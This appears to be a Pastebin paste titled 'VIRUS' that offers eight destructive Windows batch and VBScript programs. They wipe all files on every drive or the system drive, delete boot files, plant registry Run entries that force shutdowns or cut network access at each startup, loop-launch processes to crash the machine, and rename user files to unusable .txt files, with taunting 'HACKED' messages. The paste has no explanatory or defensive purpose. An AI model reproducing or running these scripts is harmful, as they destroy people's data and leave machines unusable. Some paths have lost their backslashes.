Advertisement
HarshTech

VIRUS

Sep 16th, 2019
2,933
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.02 KB | None | 0 0
  1. VIRUS 1-DELETE ALL PARTITIONS
  2. @echo off
  3. Del C:\*.* /f /s /q
  4. Del D:\*.* /f /s /q
  5. Del E:\*.* /f /s /q
  6. Del F:\*.* /f /s /q
  7. Del G:\*.* /f /s /q
  8. Del H:\*.* /f /s /q
  9. Del I:\*.* /f /s /q
  10.  
  11.  
  12. VIRUS 2-This Virus Deletes All The Content Of C Drive
  13. @echo off
  14. del %systemdrive%*.* /f /s /q
  15. shutdown -r -f -t 00
  16.  
  17. VIRUS 3-This Will Crash your Computer
  18. Option Explicit
  19.  
  20. Dim WSHShell
  21. Set WSHShell=Wscript.CreateObject("Wscript.Shell")
  22.  
  23. Dim x
  24. For x = 1 to 100000000
  25. WSHShell.Run "Tourstart.exe"
  26. Next
  27. SAVE AS .VBS
  28.  
  29.  
  30. VIRUS 4-Virus that crashes pc
  31. @echo off
  32. attrib -r -s -h c:autoexec.bat
  33. del c:autoexec.bat
  34. attrib -r -s -h c:boot.ini
  35. del c:boot.ini
  36. attrib -r -s -h c:ntldr
  37. del c:ntldr
  38. attrib -r -s -h c:windowswin.ini
  39. del c:windowswin.ini
  40. @echo off
  41. msg * YOU GOT OWNED!!!
  42. shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
  43.  
  44.  
  45. VIRUS 5-Shutdowns Computer Everytime It Is Turned On
  46. echo @echo off>c:windowshartlell.bat
  47. echo break off>>c:windowshartlell.bat
  48. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
  49. echo end>>c:windowshartlell.bat
  50. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
  51. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
  52. echo You have been HACKED.
  53. PAUSE
  54.  
  55.  
  56. VIRUS 6-DISABLES NET FOREVER
  57. echo @echo off>c:windowswimn32.bat
  58. echo break off>>c:windowswimn32.bat
  59. echo ipconfig/release_all>>c:windowswimn32.bat
  60. echo end>>c:windowswimn32.bat
  61. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  62. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  63. echo You Have Been HACKED!
  64. PAUSE
  65.  
  66.  
  67. VIRUS 7-CHANGE ALL FILES TO NON WORKING TXT FILES
  68. REN *.DOC *.TXT REN *.JPEG *.TXT
  69. REN *.LNK *.TXT
  70. REN *.AVI *.TXT
  71. REN *.MPEG *.TXT
  72. REN *.COM *.TXT
  73. REN *.BAT *.TXT
  74.  
  75.  
  76. VIRUS 8-SYSTEM MELTDOWN
  77. :CRASH
  78. net send * WORKGROUP ENABLED
  79. net send * WORKGROUP ENABLED
  80. GOTO CRASH
  81. ipconfig /release
  82. shutdown -r -f -t0
  83. echo @echo off>c:windowshartlell.bat
  84. echo break off>>c:windowshartlell.bat
  85. echo shutdown -r -t 11 -f>>c:windowshartlell.bat
  86. echo end>>c:windowshartlell.bat
  87. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
  88. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v HAHAHA /t reg_sz /d c:windowshartlell.bat /f
  89. echo You Have Been Hackedecho @echo off>c:windowswimn32.bat
  90. echo break off>>c:windowswimn32.bat
  91. echo ipconfig/release_all>>c:windowswimn32.bat
  92. echo end>>c:windowswimn32.bat
  93. reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
  94. reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
  95. echo YOU HAVE BEEN HACKED BITCH
  96. REN *.DOC *.TXT
  97. REN *.JPEG *.TXT
  98. REN *.LNK *.TXT
  99. REN *.AVI *.TXT
  100. REN *.MPEG *.TXT
  101. REN *.COM *.TXT
  102. REN *.BAT *.TXT
  103. PAUSE
  104. PAUSE
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement